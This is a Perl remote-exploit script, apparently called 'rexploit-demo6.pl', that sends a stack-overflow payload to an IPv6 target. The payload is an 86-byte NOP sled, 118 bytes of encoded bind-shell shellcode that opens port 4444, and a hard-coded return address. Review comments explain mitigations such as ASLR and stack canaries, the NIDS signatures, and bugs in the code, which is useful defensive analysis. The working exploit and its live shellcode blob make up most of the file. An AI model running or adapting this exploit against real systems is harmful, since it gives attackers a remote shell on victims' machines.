#!/usr/bin/perl
# Remote Exploit Demo rexploit-demo6.pl by Ph03n1X
#
# Demo script: connects to the IPv6 host and port given on the command
# line, writes one fixed 208-byte buffer (86-byte NOP sled + 118-byte
# shellcode + 4-byte return address) to the socket and exits.  Nothing
# is read back from the target; the closing message is only a reminder.
#
# Defensive notes (review):
#  - The return address is a fixed absolute stack address, so the
#    technique presumes a non-randomised stack.  ASLR, a non-executable
#    stack and stack canaries are the standard mitigations for this
#    class of overflow.
#  - On the wire the payload is a long run of 0x90 bytes followed by
#    the shellcode, a classic NIDS signature; on the host, a new
#    unexpected listener on TCP/4444 (per the author's own comment
#    on the shellcode) is the post-exploitation indicator.
use strict;
use warnings;
#cpan IO::Socket::INET6
use IO::Socket::INET6;

# Usage check: needs host ($ARGV[0]) and port ($ARGV[1]).  Only the
# script name is printed when the port is missing; note that a port of
# "0" is also rejected here, since it is false in boolean context.
if(!$ARGV[1]){
    print $0 . " \n";
    exit;
}
# Refuse dotted-quad IPv4 literals: the socket below is IPv6 only.
# NOTE(review): the pattern is unanchored, so any address containing
# four dot-separated digit groups (e.g. an IPv4-mapped IPv6 address)
# is refused as well.
if($ARGV[0] =~ m/(\d+)\.(\d+)\.(\d+)\.(\d+)/){
    print $0 . " is not IPv6 family\n";
    exit;
}
#118 bytes shellcode bind execve on port 4444
#encoded with x86/shikata_ga_nai msf
# (Eight 14-byte lines plus a 6-byte line = 118 bytes, as stated.)
my $shellcode = "\x2b\xc9\xdd\xc6\xb1\x17\xb8\x9f\xd4\xfb\x8e\xd9\x74\x24" .
                "\xf4\x5a\x83\xc2\x04\x31\x42\x14\x03\x42\x14\xe2\x6a\xe5" .
                "\x20\xdd\xd7\x55\xbd\xe8\x5e\xb8\x2b\x8b\x38\xf6\x2c\xc5" .
                "\x21\x5a\x7f\xb8\x03\x09\x2d\x5a\xcb\xbc\x8d\xc4\x63\xb5" .
                "\x2d\x80\x92\xa3\x31\xc3\x02\xbd\xab\xa0\xc0\xdb\x73\xea" .
                "\x94\x94\xe2\x47\x90\x19\x6a\xf5\xca\xf7\xe2\x1b\xa9\x47" .
                "\x92\x16\xad\x3b\x02\xc3\x92\x63\x78\x93\xa5\xea\x7a\xfc" .
                "\x1a\x22\x08\x95\x0c\x13\x8c\x0c\xa2\xe2\xb3\x9f\x69\x7c" .
                "\xd2\x90\x86\xb3\x95\xdb";
#NOP 86 bytes
my $nop = "\x90"x86;
# Overwritten return address, little-endian 0xbffff7e0: a hard-coded
# stack address that is only meaningful for the author's demo target.
my $eip = "\xe0\xf7\xff\xbf";
# TCP connect over IPv6 with a 5 second timeout.  NOTE(review): the
# constructor's return value is never checked, so a failed connect
# leaves $s undef and the print below dies with "Can't use an undefined
# value as a symbol reference" instead of a readable error.
my $s = IO::Socket::INET6->new(PeerAddr => $ARGV[0], PeerPort => int($ARGV[1]), Domain => AF_INET6, Timeout => 5);
# $buffer is assembled but never used; the print below re-concatenates
# the same three parts, so the bytes sent are identical.
my $buffer = $nop . $shellcode . $eip;
#print $buffer . "\n";
print $s $nop.$shellcode.$eip;
# No response is awaited; this is purely a reminder of the bind port
# named in the shellcode comment above.
print "Check your shell at " . $ARGV[0] . " on port 4444\n";
close($s);